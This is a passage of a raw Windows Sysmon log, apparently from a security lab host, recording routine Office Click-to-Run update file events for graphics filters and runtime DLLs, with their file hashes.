Shared\GRPHFLT\WPGIMP32.FLTMD5=988758226AADFC997216106CB6FE55D8,SHA256=969202808A325239E2DFFB20A2E2B5344A3FF6CE97869D6ECD735ECCA4A4E807,IMPHASH=EE4574B36A3D1701F6EC0EB100850FDFtruetrue 23542300x800000000000000070852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\PNG32.FLTMD5=D695055DD69E14F0DE326A5A54D581A5,SHA256=82C8F18E993A97B8D792D01B980F5B2427571654F9CB5D95F5918538339FBD9D,IMPHASH=9311B32150CC1A5A2D676652039B0691truetrue 23542300x800000000000000070851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\MS.WPGMD5=ED21686ACF6F81430B47AADD809139BF,SHA256=BEB31AF1581AF2866335BD0AD03D916B24C7BF6AEB707C703B6F40CFC8F0BCED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\MS.PNGMD5=3A4407BE2AFBD8B0348459D72F94127D,SHA256=39D247AE0014A175EC24CE5207B08F4017328CB1AAE8916B046B5AC954899442,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\MS.JPGMD5=A1B434EA0C57B8F8B234D7DDDFD67D5F,SHA256=FFB1A4DD4B6DA771D46DEF621CF71421051203606AA1D3B64B73E92606328ECB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\MS.GIFMD5=6936F4EE421C9242C660DE4DFD7191B6,SHA256=827F3149A54C5BCD6FC435953DCA7A7806F76D6F9DA89409D8763859233DF933,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\JPEGIM32.FLTMD5=C7829CBAF3867C16BC667C4E1C60F02E,SHA256=B99DF7D5B12D6B3F834C6A58172D8F5D6D431EF40349B4916E02AE0592E514BF,IMPHASH=71DA293CC9F19377A091EBE693CA4C65truetrue 23542300x800000000000000070846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\GIFIMP32.FLTMD5=F346DC75F9E5324D81435CF54BE6A76B,SHA256=BDEA22FC814CCC04D06924FD1CEC99E2F2FFF8FB0E61444591885410AB66DBC9,IMPHASH=E052F65BD3849FA6E50EE2A3C73603EDtruetrue 23542300x800000000000000070845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\vcruntime140_1.dllMD5=9040ED0FDF4CE7558CBFFB73D4C17761,SHA256=6CC4315DACEB0522816C60678344466CB452426267F70C7FAAE925361674E774,IMPHASH=AE0BDE6314FA2027B54CE04898F6AB69truetrue 23542300x800000000000000070844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\vcruntime140.dllMD5=23105A395B807D9335219958B4D0CEC1,SHA256=61832990E364DCA5BFA2C61D930F00ACAAE6D1AAA3130392403455AE9A1125A5,IMPHASH=F143E2868EFDE0FCB493BD3051708A62truetrue 23542300x800000000000000070843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\vccorlib140.dllMD5=DDD9457EF184CC3897B8198D262F4339,SHA256=41B6AF9484C860804C69E00C9D7FEE22EFE5F769C51355936FC9DE248221DE94,IMPHASH=4A5F3C3AA39A4E0497DFF0471239D5F9truetrue 23542300x800000000000000070842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\ucrtbase.dllMD5=ED27C615D14DADBE15581E8CB7ABBE1C,SHA256=1CA33187B0E81CD0B181A554718CAFFF2D17C3F6795E6E0824F844ABFBADDC07,IMPHASH=5E97252FEC9CAEB9BB1DDC7CC50F68A6truetrue 23542300x800000000000000070841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\offfiltx.dllMD5=14F162B1594E1B1AFB74B0536462014E,SHA256=2624EA4CD9816E606E77B64A09705957B0F3E4FD04ABE58B4E8A572700F30F4C,IMPHASH=A7C1652FE2FDD996916061191AF331CFtruetrue 23542300x800000000000000070840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\odffilt.dllMD5=8FE9E31E087A174E13E479A8CCC55130,SHA256=3C7A75FD410593D8BF8BE92318A206775C588B96B5CEAFB3B675BCDFCCDB7F52,IMPHASH=57FDC98D953D12994CD6EA7ED8230844truetrue 23542300x800000000000000070839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\msvcr120.dllMD5=49FB6E786B2F9DF8812E0E317CED55CB,SHA256=9461F2E4ADD5C650102ACDE0C62377FF86D9B19FC20D0003F326CCD474E8B7B9,IMPHASH=8F18E22935EF8B336E246EE763FBEC97truetrue 23542300x800000000000000070838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\msvcp140.dllMD5=A1D30EF2114E18E26E2BB96555BE81BF,SHA256=F87819AE8C6F7C90D3237A1ABB9809E8CBA9DCD0C80AC3F0969A5E68EF652CA4,IMPHASH=C0E775D13A8146396B3DE4DC441694A7truetrue 23542300x800000000000000070837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\msvcp120.dllMD5=8C8D1140787DA60A343DD11C1CDF4992,SHA256=6AA1ECE9DD340D05AEC43248592A78B70D21959DE8727F506D21A3A962348583,IMPHASH=D0A59246EAB41D54812CD63C2326E1F1truetrue 23542300x800000000000000070836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\msgfilt.dllMD5=8DD6B773DBD7819B0F5F7B36AADD0C71,SHA256=86D512C75DB5320C60248C641690AC9675F515813C2E28EA6FC4044FCAAB1CCA,IMPHASH=1B8BC79B4931D6DF2B15647693E21930truetrue 23542300x800000000000000070835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\mfc140u.dllMD5=C6A732F23B907BC6D37982F47F4B4453,SHA256=C8DAB45709404E6607B21A641895C6B6953550780B2245C3792E64244A10DA8E,IMPHASH=D774F0CF6BA79D3B787D3AE2DC21DC54truetrue 23542300x800000000000000070834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\concrt140.dllMD5=EB42B164D603672E07997019BB00E4AD,SHA256=DABDB0732B2FC14040CEDBBFD369D9EB3C7A2E66B38A79892E1C05E6D6A8526D,IMPHASH=E29B9617328962A9B58721E88E2FD959truetrue 23542300x800000000000000070833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-utility-l1-1-0.dllMD5=F440DC5623419E013D07DD1FCD197156,SHA256=BBA068F29609630E8C6547F1E9219E11077426C4F1E4A93B712BFBA11A149358,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-time-l1-1-0.dllMD5=05AF3F787A38ED1974FF3BDA3D752E69,SHA256=F4163CBC464A82FCE47442447351265A287561C8D64ECC2F2F97F5E73BCB4347,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-string-l1-1-0.dllMD5=3A96F417129D6E26232DC64E8FEE89A0,SHA256=01E3C0AA24CE9F8D62753702DF5D7A827C390AF5E2B76D1F1A5B96C777FD1A4E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-stdio-l1-1-0.dllMD5=53E23E326C11191A57DDF7ADA5AA3C17,SHA256=293C76A26FBC0C86DCF5906DD9D9DDC77A5609EA8C191E88BDC907C03B80A3A5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-runtime-l1-1-0.dllMD5=C25321FE3A7244736383842A7C2C199F,SHA256=BF55134F17B93D8AC4D8159A952BEE17CB0C925F5256AA7F747C13E5F2D00661,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-process-l1-1-0.dllMD5=E18FD20E089CB2C2C58556575828BE36,SHA256=B06B2D8C944BFF73BD5A4AAD1CAD6A4D724633E7BD6C6B9E236E35A99B1D35F2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-private-l1-1-0.dllMD5=B4BE272187CB85E719DFB5BF48BB9B1B,SHA256=CCAF41E616B9A872D35C8083CBF8FDC14371FA3EF159FE699514643C26A4EBF3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-multibyte-l1-1-0.dllMD5=FF4DE9CE85C4B01312DF6E3CDD81B0FF,SHA256=D7E676B9F1E162957D0549AB0B91E2CD754643490B0654BF9A86AA1E77CB3C37,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-math-l1-1-0.dllMD5=877C5FF146078466FF4370F3C0F02100,SHA256=9B05A43FDC185497E8C2CEA3C6B9EB0D74327BD70913A298A6E8AF64514190E8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-locale-l1-1-0.dllMD5=0D50A16C2B3EC10B4D4E80FFEB0C1074,SHA256=FAB41A942F623590402E4150A29D0F6F918EE096DBA1E8B320ADE3EC286C7475,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-heap-l1-1-0.dllMD5=5D409D47F9AEBD6015F7C71D526028C3,SHA256=7050043B0362C928AA63DD7800E5B123C775425EBA21A5C57CBC052EBC1B0BA2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-filesystem-l1-1-0.dllMD5=D76F73BE5B6A2B5E2FA47BC39ECCDFE5,SHA256=6C86E40C956EB6A77313FA8DD9C46579C5421FA890043F724C004A66796D37A6,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-environment-l1-1-0.dllMD5=FE93C3825A95B48C27775664DC54CAE4,SHA256=C4ED8F65C5A0DBF325482A69AB9F8CBD8C97D6120B87CE90AC4CBA54AC7D377A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-convert-l1-1-0.dllMD5=AFC20D2EF1F6042F34006D01BFE82777,SHA256=CD5256B2FB46DEAA440950E4A68466B2B0FF61F28888383094182561738D10A9,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-conio-l1-1-0.dllMD5=E3D0F4E97F07033C1FEAF72362BBB367,SHA256=3067981026FAD83882F211BFE32210CE17F89C6A15916C13E62069E00D5A19E3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-core-xstate-l2-1-0.dllMD5=42DC903598FF9D2BFB92D3F1F1563A92,SHA256=583BE047AA83CCE2E8950F5F550DABC5F7CB5957860316E3F409BFAFB10B963C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-core-timezone-l1-1-0.dllMD5=BDD63EA2508C27B43E6D52B10DA16915,SHA256=7D4252AB1B79C5801B58A08CE16EFD3B30D8235733028E5823F3709BD0A98BCF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-core-synch-l1-2-0.dllMD5=B9BC664A451424342A73A8B12918F88D,SHA256=0C5C4DFEA72595FB7AE410F8FA8DA983B53A83CE81AEA144FA20CAB613E641B7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-core-processthreads-l1-1-1.dllMD5=247061D7C5542286AEDDADE76897F404,SHA256=CCB974C24DDFA7446278CA55FC8B236D0605D2CAAF273DB8390D1813FC70CD5B,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-core-localization-l1-2-0.dllMD5=6B4F2CA3EFCEB2C21E93F92CDC150A9D,SHA256=B39A515B9E48FC6589703D45E14DCEA2273A02D7FA6F2E1D17985C0228D32564,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-core-file-l2-1-0.dllMD5=ADB3471F89E47CD93B6854D629906809,SHA256=355633A84DB0816AB6A340A086FB41C65854C313BD08D427A17389C42A1E5B69,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-core-file-l1-2-0.dllMD5=19DF2B0F78DC3D8C470E836BAE85E1FF,SHA256=BD9E07BBC62CE82DBC30C23069A17FBFA17F1C26A9C19E50FE754D494E6CD0B1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 